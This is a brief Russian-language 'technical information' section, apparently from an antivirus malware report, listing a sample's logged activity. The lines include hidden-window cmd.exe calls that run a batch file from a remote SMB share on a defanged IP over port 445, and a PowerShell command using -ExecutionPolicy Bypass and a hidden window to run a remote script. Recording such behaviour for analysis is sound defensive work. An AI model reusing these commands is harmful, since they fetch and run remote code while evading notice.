Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo off
- '<SYSTEM32>\cmd.exe' /c "\\18#.#13.208.245\bypass\runOnce.bat"
- '<SYSTEM32>\cmd.exe' /c exit
- '18#.#13.208.245':445
- '18#.#13.208.245':445
- '<SYSTEM32>\cmd.exe' /c echo off' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "\\18#.#13.208.245\bypass\runOnce.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c exit' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -win hidden -ExecutionPolicy Bypass -File "\\18#.#13.208.245\bypass\u.ps1"
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\WmiMgmt.msc"